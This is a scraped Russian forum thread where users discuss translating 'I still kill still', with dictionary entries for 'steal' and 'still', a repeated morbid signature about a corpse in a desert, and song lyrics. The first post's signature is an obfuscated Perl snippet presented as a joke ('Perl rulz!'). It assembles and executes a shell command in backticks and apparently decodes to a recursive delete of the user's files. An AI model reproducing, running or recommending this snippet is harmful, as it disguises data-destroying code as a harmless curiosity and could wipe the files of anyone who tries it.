тут кажется были уже его слушатели ))) _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!
Или тихий,спокойный,если в качестве прилагательного. _________________ Жаркая пустыня Дагестана.За высоким барханом лежит труп.Это мой,мой,мой труп лежит.Из свежей раны течёт кровь.Это моя,моя,моя кровь течёт.И в жаркой пустыне Дагестана за высоким барханом чей-то труп знакомый валяется!Это мой труп!Нет.Это твой труп?Нет.Это наш труп!И из ещё дымящейся раны течёт алая кровь.
i still kill still _________________ Жаркая пустыня Дагестана.За высоким барханом лежит труп.Это мой,мой,мой труп лежит.Из свежей раны течёт кровь.Это моя,моя,моя кровь течёт.И в жаркой пустыне Дагестана за высоким барханом чей-то труп знакомый валяется!Это мой труп!Нет.Это твой труп?Нет.Это наш труп!И из ещё дымящейся раны течёт алая кровь.
я всё ещё убиваю тихо _________________ Жаркая пустыня Дагестана.За высоким барханом лежит труп.Это мой,мой,мой труп лежит.Из свежей раны течёт кровь.Это моя,моя,моя кровь течёт.И в жаркой пустыне Дагестана за высоким барханом чей-то труп знакомый валяется!Это мой труп!Нет.Это твой труп?Нет.Это наш труп!И из ещё дымящейся раны течёт алая кровь.
steal [] 1. ; stole , stolen
1)
а) воровать, красть to steal smth. from smb. ? украсть что-л. у кого-л. They've stolen our liberty. ? Они похитили нашу свободу. Syn: filch , pilfer , pinch , purloin , sneak
б) отбить, увести
2)
а) = steal up прокрасться, проскользнуть Jim stole away without anyone seeing him. ? Джиму удалось ускользнуть так, что его никто не заметил.
б) делать что-л. незаметно, тайком или без разрешения to steal a kiss ? сорвать украдкой поцелуй Syn: lurk
3) постепенно захватывать, овладевать (о чувстве, внимании) to steal (the) picture / the scene ? затмить всех; оказаться в центре внимания I come not, friends, to steal away your hearts. ? Друзья, я пришёл не для того, чтобы похитить ваши сердца. ...>>
Цитата:
[still] I
1.
1) бесшумный, тихий, безмолвный
2) неподвижный still air ? неподвижный воздух still rain ? дождь без ветра still streams ? неподвижные воды Syn: noiseless , quiet , silent , tranquil
3)
а) неигристый (о вине)
б) негазированный (о напитках) ?? still small voice ? голос совести - keep still
2.
1)
а) безмолвие, тишина No murmur waked the solemn still, save tinkling of a mountain rill. ? Никакие звуки не будили торжественную тишину, кроме журчания горного ручейка.
б) неподвижность, спокойствие
_________________ Жаркая пустыня Дагестана.За высоким барханом лежит труп.Это мой,мой,мой труп лежит.Из свежей раны течёт кровь.Это моя,моя,моя кровь течёт.И в жаркой пустыне Дагестана за высоким барханом чей-то труп знакомый валяется!Это мой труп!Нет.Это твой труп?Нет.Это наш труп!И из ещё дымящейся раны течёт алая кровь.
Добавлено: Вс Янв 11, 2009 4:28 am Заголовок сообщения:
Laurel Aitken - Sally Brown _________________ Everybody like to be
in my place instead of me
cause I?m the king of Bongo
baby I?m the king of Bongo Bong